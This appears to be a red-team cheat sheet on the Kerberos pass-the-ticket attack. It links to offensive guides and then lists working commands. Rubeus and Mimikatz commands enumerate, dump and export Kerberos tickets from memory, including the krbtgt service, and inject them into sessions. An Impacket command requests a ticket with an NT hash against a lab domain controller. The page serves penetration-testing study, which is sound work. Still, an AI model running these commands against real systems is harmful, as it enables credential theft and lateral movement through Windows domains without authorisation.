Pass The Ticket

Resources

• Offensive
  • By crimsonlabs : https://crimsonlabs.io/posts/pass-the-ticket/
  • By hacking_articles : https://www.hackingarticles.in/lateral-movement-pass-the-ticket-attack/ || https://www.hackingarticles.in/a-detailed-guide-on-rubeus/
  • By tw1sm : https://tw1sm.github.io/2021-02-01-kerberos-conversion/
  • By netwrix : https://www.netwrix.com/pass_the_ticket.html

Cheat Sheet

• By benheater : https://notes.benheater.com/books/active-directory/page/pass-the-ticket
• By thehacker.recipes : https://www.thehacker.recipes/ad/movement/kerberos/ptt
• By viperone : https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/lateral-movement/alternate-authentication-material/wip-pass-the-ticket

Commnds

• Recon
  • LOTL
    • klist

      klist

    • Win32_LogonSession

      Get-CimInstance -ClassName Win32_LogonSession | ForEach-Object {
      $Luid = [System.Convert]::ToString([int64]$_.LogonId, 16)
      $User = $_ | Get-CimAssociatedInstance -ResultClassName Win32_Account -ErrorAction SilentlyContinue
      [PSCustomObject]@{
          LUID     = "0x$Luid"
          UserName = $User.Name
          Domain   = $User.Domain
          Type     = $_.LogonType
      }

    } | Where-Object { $_.UserName } | Format-Table -AutoSize ```
  • Rubues

    .\Rubeus.exe triage
    .\Rubeus.exe klist

  • Mimikatz

    sekurlsa::tickets # sekurlsa uses memory reading and is not subject to key export restrictions.
    kerberos::list # Only for the current session 
    kerberos::list /export # export 

• Generating
  • Impacket
    • getTGT

      sudo timedatectl set-ntp off # if u ran from virtualmachine
       
      sudo ntpdate 192.168.99.30 && impacket-getTGT 'redteamrecipes.com/fmoheb' -hashes :70acaa6bad1c4d34405f748f3fa4a9d1 -no-pass -dc-ip 192.168.99.30
       
      export KRB5CCNAME=fmoheb.ccache

• Dumping
  • Rubues

    .\Rubeus.exe dump /luid:0x3e7 /nowrap
    .\Rubeus.exe dump /service:krbtgt /nowrap

• Passing
  • Rubues

    .\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show /ticket:doIGSzCCBkegAwIBBaEDAgEWooIFMzCCBS9hggUrMIIFJ6A.....
    .\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show /ticket:'./output.kirbi' /show
     
    .\Rubeus.exe ptt /luid:0x10888c /ticket:./output.kirbi => the luid is mine (From klist ) this need admin
     
    .\Rubeus.exe tgssub /altservice:cifs /ticket:./output.kirbi /nowrap
     
    # Tips & Tricks
    .\Rubeus.exe describe /ticket:doIGDjCCBgqgAwIBBaEDAgEWooIE/jC
     
    [IO.File]::WriteAllBytes("C:\output.kirbi", [Convert]::FromBase64String("doIGSzCCBkegAwI....."))
     
    Rubeus.exe renew /ticket:doIF3jCCBdqgAwIB

  • Mimikatz

    kerberos::ptt C:\Users\htb-student\Desktop\output.kirbi

Notes